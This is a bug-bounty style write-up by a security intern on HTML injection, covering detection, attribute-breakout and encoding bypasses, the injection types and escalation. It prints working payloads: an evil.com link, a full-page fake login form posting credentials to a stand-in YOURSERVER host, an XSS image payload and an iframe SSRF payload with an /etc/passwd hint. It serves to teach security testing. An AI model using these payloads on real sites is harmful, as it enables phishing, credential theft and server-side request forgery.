Research on HTML Injection
Hello guysđđ ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly given some interesting tasks, In my nineth task I was given to research about HTML Injection Vulnerability and write a report about it.
What is HTML Injection?
HTML Injection also termed as âvirtual defacementsâ is one of the most simple and the most common vulnerability that arises when the web-page fails to sanitize the user-supplied input or validates the output, which thus allows the attacker to craft his payloads and injects the malicious HTML codes into the application through the vulnerable fields, such that he can modify the webpage content and even grabs up some sensitive data.
When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a userâs trust.
Latest HTML version is HTML 5.
How to Detect HTML Injection?
You can detect HTML injection via first finding parameters and endpoint taking user input and reflecting it back on the client side. Also the injection point can be at one place and the place it is reflecting back can be at another place so remember to look thoroughly.
Following payloads can be used to find it:
1. <h1>SAPT</h1> and <h6>SAPT</h6> and compare them
2. <img src=img_url> Check if given image is injected
3. <a href=https://evil.com>ClickHere</a> Check if link in injected.
By trying this you can definitely be blocked or filter techniques would be there, so should you give up? No, we also have some methods to bypass these features.
1. My favourite technique for manual hunting of this is âQuery Balancingâ , it is applicable on XSS too, not only HTML Injection.
For your input (idnf) if there is a following HTML Source:
<input type=âtextâ value=âidnfâ>
In such cases to escape value tag you have to start your payload with â>
What happens? Here it actually closes the input area before our payload, so our input wonât be stored in the âvalueâ parameter and it will act as an open string. So if the web application firewall is checking the content of the value parameter only then there wonât be anything suspicious and the request will pass, but the rest of the payload will stay in the web application and it will consider that as a part of code and will be executed. Hence Bypassed.
2. You can also use encodings on your payload and inject them to bypass it, like base64 encoding or URL encoding. It sometimes bypasses the filters.
What are the Different Types of HTML Injection?
1. Reflected HTML Injection
When you inject an HTML payload and then an only then it is shown at that moment and as soon as it reloads the injection goes away. It is generally on GET parameters and sometimes on POST parameters too.
2. Stored HTML Injection
When you inject an HTML payload and it stays there until the change, even if you log out your account and come back, hence it is stored.
3. Email HTML Injection
When the content of emails coming in your mail box is injected with HTML Payloads it is known as Email HTML Injection. This is P4 according to Bugcrowd VRT.
What are the Exploit Scenarios / Escalation For HTML Injection?
1. The most basic exploit is to use HTML injection as a medium for social engineering. It can be done by injecting a link
<a href=https://evil.com>ClickHere for Rewards</a>
Or by Injecting a complete form
<div style=âposition: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;â>Please login with valid
credenitals:<br><form name=âloginâ action=âhttp://YOURSERVER/login.htm">
<table><tr><td>Username:</td><td><input type=âtextâ name=âusernameâ/></td></tr><tr><td>Password:</td>
<td><input type=âtextâ name=âpasswordâ/></td></tr><tr>
<td colspan=2 align=center><input type=âsubmitâ value=âLoginâ/></td></tr>
</table></form>
2. It can also be escalated to XSS with the help of HTML Injection which is pretty common. Eg payload <IMG SRC=JaVaScRiPt:alert(âXSSâ)> can be used for this.
- HTML Injection to SSRF via use <iframe> tags. Eg of payload can be used <iframe src=âhttp://BURP-COLLABORATOR-URL"></iframe>.
Since it is ssrf it can sometimes also be used to read server files like /etc/passwd to drastically changing severity.
How to Mitigate HTML Injection Vulnerability?
The best way to mitigate this is to properly filter user input as well as block metacharacters.
This is all for todayâs writeup.
Thanks For Reading đ
Profile Links:
Twitter: https://twitter.com/SAPT01
LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/
Instagram: https://instagram.com/prajit_01?utm_medium=copy_link
BUG XS Official Website: https://www.bugxs.co/
